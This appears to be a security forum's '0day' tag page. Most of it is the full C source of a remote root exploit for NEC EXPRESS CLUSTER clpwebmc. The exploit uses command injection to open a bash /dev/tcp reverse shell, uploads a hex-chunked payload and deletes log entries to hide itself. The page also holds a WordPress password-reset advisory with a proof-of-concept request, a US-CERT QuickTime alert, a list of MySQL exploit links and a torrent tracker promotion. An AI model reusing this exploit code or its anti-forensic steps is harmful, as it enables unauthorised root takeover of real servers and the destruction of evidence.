Search the Community
Showing results for tags '0day'.
-
NEC EXPRESS CLUSTER comes with Cluster Manager, a Java applet for cluster configuration and management. The underlying webserver 'clpwebmc' runs as root and accepts connections on TCP port 29003 which can be initiated without authentication in the default installation. /* * 2017 update: as of 3.3.4 this bug seems to be fixed * - fixed versions: * NEC EXPRESSCLUSTER X 3.3.4-1 for Linux(amd64) * NEC EXPRESSCLUSTER X SingleServerSafe 3.3.4-1 for Linux(amd64) */ /* * *** THIS IS PRIVATE + UNPUBLISHED (0-DAY) SOURCE CODE, DO NOT DISTRIBUTE *** * * NEC EXPRESS CLUSTER clpwebmc Linux remote root exploit by cenobyte 2015 * <vincitamorpatriae@gmail.com> * * - product description: * NEC EXPRESS CLUSTER is a family of integrated high availability and disaster * recovery software solutions that address the fast recovery and continuous * protection needs of business critical applications and data. With increased * servers and complexity of server applications running Windows or Linux, * EXPRESS CLUSTER minimizes planned and unplanned system outages. * * - vulnerability description: * NEC EXPRESS CLUSTER comes with Cluster Manager, a Java applet for cluster * configuration and management. The underlying webserver 'clpwebmc' runs as * root and accepts connections on TCP port 29003 which can be initiated without * authentication in the default installation. * * A function is available to remove temporary work directories by issuing the * following GET request to port 29003, appended with the location of the * directory that is supposed to be deleted: * GET /DeleteWorkDirectory.js?WorkGuid=directoryname * * The working of the DeleteWorkDirectory.js HTTP request roughly translates to * the following C code: * * void * remove_dir_path(char *WorkGuidParameter) * { * char x[128]; * snprintf(x, sizeof(x), "rm -fr /opt/nec/clusterpro/%s", * WorkGuidParameter); * system(x); * } * * No input sanitation is performed and the supplied arguments are passed * straight on to system(). By setting the WorkGuid parameter to '0' and * appending a semicolon followed by arbritrary commands it is possible to * execute those commands as root on the remote machine. * * Example HTTP GET request with command injection: * GET /DeleteWorkDirectory.js?WorkGuid=0;id>/tmp/id.txt * * Which results on the remote host: * $ ls -la /tmp/id.txt * -rw-rw-rw- 1 root root 57 Apr 20 16:37 /tmp/id.txt * $ cat /tmp/id.txt * uid=0(root) gid=0(root) groups=0(root) * * - tested vulnerable versions: * NEC EXPRESSCLUSTER X 3.3.0-1 for Linux(x86_64) on CentOS 6 * NEC EXPRESSCLUSTER X 3.1 for Linux(x86_64) on CentOS 6 * NEC EXPRESSCLUSTER X 2.1.4-1 for Linux(x86_64) on CentOS 6 * NEC ExpressCluster X LAN for Linux 2.0.2-1 i686 on CentOS 5 * NEC ExpressCluster X WAN for Linux 2.0.2-1 i686 on CentOS 5 * * - tested versions not vulnerable: * NEC ExpressCluster SE for Linux 3.1 i386 on RHEL 4 * * - exploit details: * This exploit is fully "weaponized" as they call it nowadays. It starts a * listening port on the attacking host and connects back from the victim host * using bash /dev/tcp redirection. The attacking host cannot be behind NAT or * run a firewall due to the nature of connect-back. * * A payload system is utilised where commands are encoded to hex and split into * chunks. These chunks are then sent one by one to the victim host and appended * to a temporary file using 'echo -ne'. The temporary file gets executed in the * last request. * * For OPSEC purposes the temporary file will destroy itself and * all traces of the exploit and your IP will be deleted from these log files: * /opt/nec/clusterpro/log/webmgr.log.cur * /opt/nec/clusterpro/log/webmgr.err.cur * * - exploit compilation: * gcc -Wall clpwebmc0day-v2.c -o clpwebmc0day-v2 * * - the exploit connect-back listener is confirmed to work on: * CentOS 6 * Fedora 22 * OS X 10.10.5 * */ #include <arpa/inet.h> #include <netinet/in.h> #include <sys/socket.h> #include <sys/types.h> #include <fcntl.h> #include <netdb.h> #include <stdlib.h> #include <stdio.h> #include <string.h> #include <time.h> #include <unistd.h> #define HDR "NEC EXPRESS CLUSTER clpwebmc Linux remote root exploit by cenobyte" #define HEAD "HEAD / HTTP/1.1" #define CLPWEBMCPORT 29003 #define DEFAULTPORT 8080 #define GET "GET /DeleteWorkDirectory.js?WorkGuid=0;" /* the vulnerability */ #define INFO "GET /GetConfiguration.js?WebMgrVersion=0" /* nice info leak */ #define AUTH "Authorization: admin:" #define HTTP " HTTP/1.1\n" #define CRLF "\n\n" #define BUFSIZE 1024 #define MAXPROCCMD 194 /* max len of request.c: process_command parameter */ #define CMD "unset HISTFILE; cd /; /bin/uname -a; /usr/bin/id\n" #define CHMOD "chmod 755 " #define OVERWRITE "head -1024 /dev/urandom>" #define UNLINK "rm -f " #define ECHOAUTH "%secho -ne \"%s\">>%s%s%s%s" #define ECHO "%secho -ne \"%s\">>%s%s" #define LOG "/opt/nec/clusterpro/log/webmgr" #define ECPATH "/opt/nec/clusterpro/0" /* use the logged info leak GET request to find out the IP to connect-back */ #define CONNECTBACK "(/bin/bash 0</dev/tcp/" \ "$(grep GetConfiguration %s.log.cur|" \ "grep IP=|tail -1|tr ':' '\\n'|" \ "grep Root=1|cut -d, -f1)" \ "/%d 1>&0 2>&0) &" /* remove all log entries that reveal the vulnerability, exploit and our IP */ #define ANTIFOR "(sleep 5;for x in log err;do " \ "grep -vE 'd=0|n=0|%s|check_pass|system' %s.$x.cur>%s.0;" \ "cat %s.0>%s.$x.cur;" \ "rm -f %s.0;" \ "done) &" /* TMPPATH is the remote directory where the payload will be stored, you could * use /tmp but there's a fair chance that the sysadmin has mounted that with * 'noexec' */ #define TMPPATH "/opt/nec/clusterpro/log" int sock; int listsock; int list_s; int flags; int port = CLPWEBMCPORT; int connectback = DEFAULTPORT; extern char *__progname; char *host; char *md5; int validport(int port, char *p) { if ((port < 1) || (port > 65535)) { printf("error: %d is an invalid %s port\n", port, p); return(1); } return(0); } void usage() { printf("usage: %s -h <host> [-p|-c|-m]\n", __progname); printf("\t-p [port (default: %d)]\n", port); printf("\t-c [connect-back port (default: %d)]\n", connectback); printf("\t-m [admin user md5 hash]\n\n"); exit(1); } char *genrandom() { int len = strlen(TMPPATH) + 8; int n; char *s = "AbCdEfGhIjKlMnOpQrXtUvWxYz"; char *r = malloc(sizeof(char)*(len + 1)); sprintf(&r[0], "%s/", TMPPATH); srand(time(NULL)); for (n = strlen(TMPPATH) + 1; n < len; n++) r[n] = s[rand() % strlen(s)]; r[len] = '\0'; return(r); } int opensock(char *host, unsigned short int port) { int s; struct hostent *target; struct sockaddr_in addr; target = gethostbyname(host); if (target == NULL) { perror("gethostbyname"); exit(1); } s = socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto); if (s == -1) { perror("socket"); exit(1); } memcpy(&addr.sin_addr, target->h_addr, target->h_length); addr.sin_family = AF_INET; addr.sin_port = htons(port); if (connect(s, (struct sockaddr *)&addr, sizeof(addr)) == -1) { perror("connect"); exit(1); } return(s); } void sendsock(char *buf) { char readbuf[1024]; if (strlen(buf) >= MAXPROCCMD) { printf("sendsock() max len exceeded"); exit(1); } sock = opensock(host, port); if (write(sock, buf, strlen(buf)) < 0) { perror("write"); exit(1); } if (write(sock, CRLF, strlen(CRLF)) < 0) { perror("write"); exit(1); } if (read(sock, readbuf, sizeof(readbuf) - 1) < 0) { perror("read"); exit(1); } if (strstr(readbuf, "HTTP/1.1 200 OK") == NULL) { if (strstr(readbuf, "HTTP/1.1 403 Forbidden") != NULL) printf("[!] md5 hash is invalid %s\n", md5); else printf("[!] unknown error: [%s][%lu]\n", readbuf, strlen(readbuf)); exit(1); } #ifdef VERBOSE printf("[-] sendsock(): HTTP/1.1 200 OK\n"); #endif close(sock); } void writepayload(char *p, char *path) { char buf[MAXPROCCMD]; if (md5 == NULL) snprintf(buf, sizeof(buf), ECHO, GET, p, path, HTTP); else snprintf(buf, sizeof(buf), ECHOAUTH, GET, p, path, HTTP, AUTH, md5); if (strlen(buf) > MAXPROCCMD) { printf("writepayload(): \"%s\" size exceeds MAXPROCCMD\n", buf); exit(1); } sendsock(buf); } void execpayload(char *path) { char buf[MAXPROCCMD]; printf("[*] executing payload\n"); if (md5 == NULL) { snprintf(buf, sizeof(buf), "%s%s%s%s", GET, CHMOD, path, HTTP); sendsock(buf); snprintf(buf, sizeof(buf), "%s%s%s", GET, path, HTTP); sendsock(buf); } else { snprintf(buf, sizeof(buf), "%s%s%s%s%s%s", GET, CHMOD, path, HTTP, AUTH, md5); sendsock(buf); snprintf(buf, sizeof(buf), "%s%s%s%s%s", GET, path, HTTP, AUTH, md5); sendsock(buf); } } void sendcmd(char *p, char *path) { int i; int n = 1; int c = 0; int maxchunksize; int req; static char buf[MAXPROCCMD]; if (md5 == NULL) { req = strlen(GET) + strlen(HTTP) + strlen(path) + \ strlen(ECHO) + strlen(CRLF); } else { req = strlen(GET) + strlen(HTTP) + strlen(path) + \ strlen(ECHOAUTH) + strlen(CRLF) + strlen(AUTH) + \ strlen(md5); } #ifdef VERBOSE printf("[-] command: \"%s\"\n", p); #endif maxchunksize = (MAXPROCCMD - req) / 4; /* make the payload destroy itself on the filesystem during execution */ printf("[*] adding self destruct to payload: %s\n", path); snprintf(buf, sizeof(buf), "%s%s 2>&1;", OVERWRITE, path); writepayload(buf, path); snprintf(buf, sizeof(buf), "%s%s;", UNLINK, path); writepayload(buf, path); if (strlen(p) > maxchunksize) { printf("[-] command exceeds available space in GET request\n"); printf("[-] have to split in chunks\n"); } printf("[*] uploading command payload to: %s\n", path); printf(" payload size: %lu\n", strlen(p)); printf(" payload chunk space: %d\n", maxchunksize); printf(" number of chunks: %lu\n", strlen(p) / maxchunksize); printf("[*] uploading:\n"); printf(" chunk %d", n); #ifdef VERBOSE printf(" | "); #endif /* turn commands into a hex payload of 'maxchunksize' byte chunks which * are saved to the filesystem. this is to bypass '&' filtering and to * get around the maximum size of GET requests allowed by clpwebmc */ for (i = 0; i < strlen(p); i++) { sprintf(&buf[c * 4],"\\x%02x", p[i]); #ifdef VERBOSE printf(" %c ", p[i]); #endif if (c == (maxchunksize - 1)) { #ifdef VERBOSE printf("\n chunk %d", n); printf(" | %s", buf); #endif printf("\n"); writepayload(buf, path); c = 0; n++; printf(" chunk %d", n); #ifdef VERBOSE printf(" | "); #endif } else { c++; } } #ifdef VERBOSE printf("\n chunk %d", n); printf(" | %s", buf); #endif printf("\n"); writepayload(buf, path); execpayload(path); } void checkserver() { char buf[BUFSIZE]; sock = opensock(host, port); if (write(sock, HEAD, strlen(HEAD)) < 0) { perror("write"); exit(1); } if (write(sock, CRLF, strlen(CRLF)) < 0) { perror("write"); exit(1); } if (read(sock, buf, sizeof(buf) - 1) < 0) { perror("read"); exit(1); } close(sock); /* older clpwebmc versions present themselves as: ClusterProWebmanager * newer versions use: ClusterWebmanager */ if (strstr(buf, "Server: Cluster") == NULL || \ strstr(buf, "Webmanager") == NULL) { printf("error: %s:%d is not running clpwebmc\n", host, port); exit(1); } /* this GET request gets logged */ sock = opensock(host, port); if (write(sock, INFO, strlen(INFO)) < 0) { perror("write"); exit(1); } if (write(sock, CRLF, strlen(CRLF)) < 0) { perror("write"); exit(1); } if (read(sock, buf, sizeof(buf) - 1) < 0) { perror("read"); exit(1); } close(sock); /* OS checker * WebMgrVersion="WebMgr2.1.1_Linux" * WebMgrVersion="WebMgr3.0.0_Win" */ if (strstr(buf, "_Linux\"") == NULL) { printf("\n"); printf("[!] cannot exploit, %s is not running Linux\n", host); printf(" (your IP has been logged by the target system)\n"); exit(1); } printf("[-] %s:%d is Linux running clpwebmc\n", host, port); if ((strstr(buf, "NeedPasswdAuth=0") == NULL) && (md5 == NULL)) { printf("[!] cannot exploit: clpwebmc has a password set\n"); printf(" see usage how to send an admin password\n"); printf(" (your IP has been logged by the target system)\n"); printf("\n"); usage(); exit(1); } } void setuplistener() { struct sockaddr_in addr; printf("[*] setting up connect-back listener on port: %d\n", connectback); if ((list_s = socket(AF_INET, SOCK_STREAM, 0)) < 0 ) { perror("socket"); exit(1); } addr.sin_family = AF_INET; addr.sin_addr.s_addr = htonl(INADDR_ANY); addr.sin_port = htons(connectback); if (bind(list_s, (struct sockaddr *) &addr, sizeof(addr)) < 0) { perror("bind"); exit(1); } if (listen(list_s, BUFSIZE) < 0) { perror("listen"); exit(1); } /* set O_NONBLOCK on listening socket */ flags = fcntl(list_s, F_GETFL, 0); if (fcntl(list_s, F_SETFL, flags | O_NONBLOCK) == -1) { perror("fcntl"); exit(1); } } void connectshell() { int p; char buf[BUFSIZE]; struct timeval tm; fd_set rset; printf("[*] connecting to shell\n"); #ifdef __APPLE__ /* remove O_NONBLOCK flag on OS X machines */ flags = fcntl(list_s, F_GETFL, 0); if (fcntl(list_s, F_SETFL, flags |~ O_NONBLOCK) == -1) { perror("fcntl"); exit(1); } #endif if ((listsock = accept(list_s, NULL, NULL)) < 0) { perror("accept"); exit(1); } p = send(listsock, CMD, strlen(CMD), 0); if (p == -1) { perror("send"); exit(1); } printf("[-] connect-back successful\n\n"); tm.tv_sec = 10; tm.tv_usec = 0; while (1) { FD_ZERO(&rset); FD_SET(listsock, &rset); FD_SET(STDIN_FILENO, &rset); select(listsock + 1, &rset, NULL, NULL, &tm); if (FD_ISSET(listsock, &rset)) { p = read(listsock, buf, sizeof(buf) - 1); if (p <= 0) exit(0); buf[p] = 0; printf("%s", buf); } if (FD_ISSET(STDIN_FILENO, &rset)) { p = read(STDIN_FILENO, buf, sizeof(buf) - 1); if (p > 0) { buf[p] = 0; write(listsock, buf, p); } } } } int main(int argc, char *argv[]) { int opt; char cmd[BUFSIZE]; printf("%s\n\n", HDR); if (argc < 3) usage(); while ((opt = getopt(argc, argv, "h:p:c:m:")) != -1) switch (opt) { case 'h': host = optarg; break; case 'p': port = atoi(optarg); if (validport(port, "target") != 0) exit(1); break; case 'c': connectback = atoi(optarg); if (validport(connectback, "connect-back") != 0) exit(1); break; case 'm': md5 = optarg; printf("[-] using admin auth: %s\n", md5); break; default: usage(); } if (host == NULL) usage(); checkserver(); setuplistener(); snprintf(cmd, sizeof(cmd), CONNECTBACK, LOG, connectback); sendcmd(cmd, genrandom()); /* remove all traces of the payload that were logged by webmgr * also remove all remove_tmp_webm system entries as it reveals our vuln */ printf("[-] anti-forensics: %s.log.cur and %s.err.cur\n", LOG, LOG); snprintf(cmd, sizeof(cmd), ANTIFOR, ECPATH, LOG, LOG, LOG, LOG, LOG); sendcmd(cmd, genrandom()); connectshell(); /* never reached */ return(0); } Download clpwebmc0day-v3.c Source
-
- clpwebmc
- nec express cluster
-
(and 3 more)
Tagged with:
-
==================================================== - Discovered by: Dawid Golunski (@dawid_golunski) - dawid[at]legalhackers.com - https://legalhackers.com - ExploitBox.io (@Exploit_Box) - CVE-2017-8295 - Release date: 03.05.2017 - Revision 1.0 - Severity: Medium/High ============================================= I. VULNERABILITY ------------------------- WordPress Core <= 4.7.4 Potential Unauthorized Password Reset (0day) II. BACKGROUND ------------------------- "WordPress is a free and open-source content management system (CMS) based on PHP and MySQL. WordPress was used by more than 27.5% of the top 10 million websites as of February 2017. WordPress is reportedly the most popular website management or blogging system in use on the Web, supporting more than 60 million websites." https://en.wikipedia.org/wiki/WordPress III. INTRODUCTION ------------------------- Wordpress has a password reset feature that contains a vulnerability which might in some cases allow attackers to get hold of the password reset link without previous authentication. Such attack could lead to an attacker gaining unauthorised access to a victim's WordPress account. IV. DESCRIPTION ------------------------- The vulnerability stems from WordPress using untrusted data by default when creating a password reset e-mail that is supposed to be delivered only to the e-mail associated with the owner's account. This can be observed in the following code snippet that creates a From email header before calling a PHP mail() function: ------[ wp-includes/pluggable.php ]------ ... if ( !isset( $from_email ) ) { // Get the site domain and get rid of www. $sitename = strtolower( $_SERVER['SERVER_NAME'] ); if ( substr( $sitename, 0, 4 ) == 'www.' ) { $sitename = substr( $sitename, 4 ); } $from_email = 'wordpress@' . $sitename; } ... ----------------------------------------- As we can see, Wordpress is using SERVER_NAME variable to get the hostname of the server in order to create a From/Return-Path header of the outgoing password reset email. However, major web servers such as Apache by default set the SERVER_NAME variable using the hostname supplied by the client (within the HTTP_HOST header): https://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname Because SERVER_NAME can be modified, an attacker could set it to an arbitrary domain of his choice e.g: attackers-mxserver.com which would result in Wordpress setting the $from_email to wordpress@attackers-mxserver.com and thus result in an outgoing email with From/Return-Path set to this malicious address. As to which e-mail header the attacker would be able to modify - From or Return-Path, it depends on the server environment. As can be read on http://php.net/manual/en/function.mail.php The From header sets also Return-Path under Windows. Depending on the configuration of the mail server, it may result in an email that gets sent to the victim WordPress user with such malicious From/Return-Path address set in the email headers. This could possibly allow the attacker to intercept the email containing the password reset link in some cases requiring user interaction as well as without user interaction. Some example scenarios include: * If attacker knows the email address of the victim user. They can perform a prior DoS attack on the victim's email account (e.g by sending multiple large files to exceed user's disk quota, or attacking the DNS server) in order to cause the password reset email to be rejected by the receiving server, or not reach the destination and thus get returned to the account on attacker's server * Some autoresponders might attach a copy of the email sent in the body of the auto-replied message * Sending multiple password reset emails to force the user to reply to the message to enquiry explanation for endless password reset emails. The reply containing the password link would then be sent to attacker. etc. V. PROOF OF CONCEPT ------------------------- If an attacker sends a request similar to the one below to a default Wordpress installation that is accessible by the IP address (IP-based vhost): -----[ HTTP Request ]---- POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1 Host: injected-attackers-mxserver.com Content-Type: application/x-www-form-urlencoded Content-Length: 56 user_login=admin&redirect_to=&wp-submit=Get+New+Password ------------------------ Wordpress will trigger the password reset function for the admin user account. Because of the modified HOST header, the SERVER_NAME will be set to the hostname of attacker's choice. As a result, Wordpress will pass the following headers and email body to the /usr/bin/sendmail wrapper: ------[ resulting e-mail ]----- Subject: [CompanyX WP] Password Reset Return-Path: <wordpress@attackers-mxserver.com> From: WordPress <wordpress@attackers-mxserver.com> Message-ID: <e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com> X-Priority: 3 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Someone requested that the password be reset for the following account: http://companyX-wp/wp/wordpress/ Username: admin If this was a mistake, just ignore this email and nothing will happen. To reset your password, visit the following address: <http://companyX-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin> ------------------------------- As we can see, fields Return-Path, From, and Message-ID, all have the attacker's domain set. The verification of the headers can be performed by replacing /usr/sbin/sendmail with a bash script of: #!/bin/bash cat > /tmp/outgoing-email VI. BUSINESS IMPACT ------------------------- Upon a successfull exploitation, attacker may be able to reset user's password and gain unauthorized access to their WordPress account. VII. SYSTEMS AFFECTED ------------------------- All WordPress versions up to the latest 4.7.4 VIII. SOLUTION ------------------------- No official solution available. As a temporary solution users can enable UseCanonicalName to enforce static SERVER_NAME value https://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname This issue was first reported to WordPress security team multiple times, with the first report sent in July 2016. As there has been no progress in this case , this advisory is finally released to the public without an official patch. IX. REFERENCES ------------------------- https://legalhackers.com https://ExploitBox.io Vendor site: https://wordpress.org http://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname http://php.net/manual/en/function.mail.php https://tools.ietf.org/html/rfc5321 X. CREDITS ------------------------- Discovered by Dawid Golunski dawid (at) legalhackers (dot) com https://legalhackers.com https://ExploitBox.io Thanks to BeyondSecurity for help with contacting the vendor. XI. REVISION HISTORY ------------------------- 03.05.2017 - Advisory released, rev. 1 XII. EXPLOITBOX - A PLAYGROUND FOR HACKERS ------------------------- ExploitBox.io is coming soon. Subscribe at https://ExploitBox.io to stay updated and be there for the launch. XIII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.
-
Systems Affected Microsoft Windows with Apple QuickTime installed Overview According to Trend Micro, Apple will no longer be providing security updates for QuickTime for Windows, leaving this software vulnerable to exploitation. [1] (link is external) Description All software products have a lifecycle. Apple will no longer be providing security updates for QuickTime for Windows. [1] (link is external) The Zero Day Initiative has issued advisories for two vulnerabilities found in QuickTime for Windows. [2] (link is external) [3] (link is external) Impact Computer systems running unsupported software are exposed to elevated cybersecurity dangers, such as increased risks of malicious attacks or electronic data loss. Exploitation of QuickTime for Windows vulnerabilities could allow remote attackers to take control of affected systems. Solution Computers running QuickTime for Windows will continue to work after support ends. However, using unsupported software may increase the risks from viruses and other security threats. Potential negative consequences include loss of confidentiality, integrity, or availability of data, as well as damage to system resources or business assets. The only mitigation available is to uninstall QuickTime for Windows. Users can find instructions for uninstalling QuickTime for Windows on the Apple Uninstall QuickTime (link is external) page. [4] References [1] Trend Micro - Urgent Call to Action: Uninstall QuickTime for Windows Today (link is external) [2] Zero Day Initiative Advisory ZDI 16-241: (0Day) Apple QuickTime moov Atom Heap Corruption Remote Code Execution Vulnerabilit (link is external) [3] Zero Day Initiative Advisory ZDI 16-242: (0Day) Apple QuickTime Atom Processing Heap Corruption Remote Code Execution Vulner (link is external) [4] Apple - Uninstall QuickTime 7 for Windows (link is external) SOURCE: https://www.us-cert.gov/ncas/alerts/TA16-105A
-
MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day > MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day MySQL Remote Preauth User Enumeration Zeroday > MySQL Remote Preauth User Enumeration Zeroday MySQL Denial of Service Zeroday PoC > MySQL Denial of Service Zeroday PoC MySQL (Linux) Database Privilege Elevation Zeroday Exploit > MySQL (Linux) Database Privilege Elevation Zeroday Exploit MySQL (Linux) Heap Based Overrun PoC Zeroday > MySQL (Linux) Heap Based Overrun PoC Zeroday http://www.exploit-db.com/exploits/23075/ > MySQL (Linux) Stack Based Buffer Overrun PoC Zeroday MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot) > MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot) Vulnerabilitatiile au fost publicate pe 1 dec, iar incepand cu 2 dec au aparut POC-urile. Atentie mare tot sysadmini, faceti update la mysql au aparut patchuri deja, sau provizoriu blocati portul.
-
1. Links: Index Rules Signup 2.Categories: Anime/Cartoon Appz/MAC Appz/PC ISO Appz/PDA DOX Games/NDS Games/PC ISO Games/PC Retro Games/PS2 Games/PSP Games/Wii Games/X-BOX Games/XBOX360 Hentai Mobile Movies/DVDR Movies/Retro Movies/x264 Movies/XviD Music/DVDR Music/Flac Music/Mp3 Music/Vids TV/DVDR TV/DVDRip TV/HD TV/XviD XXX XXX/iMGSETS XXX/WEB 3.Some stats: Torrents: 1485 Users: 5084 Seeder: 1,814 Leechers: 71 Peers: 1,890 4.Registration: Free Signup 5.Screens: Index Page: Browse Page: Forums Page: 'Pace' , RESPECT Wassssup !!
- 3 replies
-
- 0day
- free signup
-
(and 3 more)
Tagged with: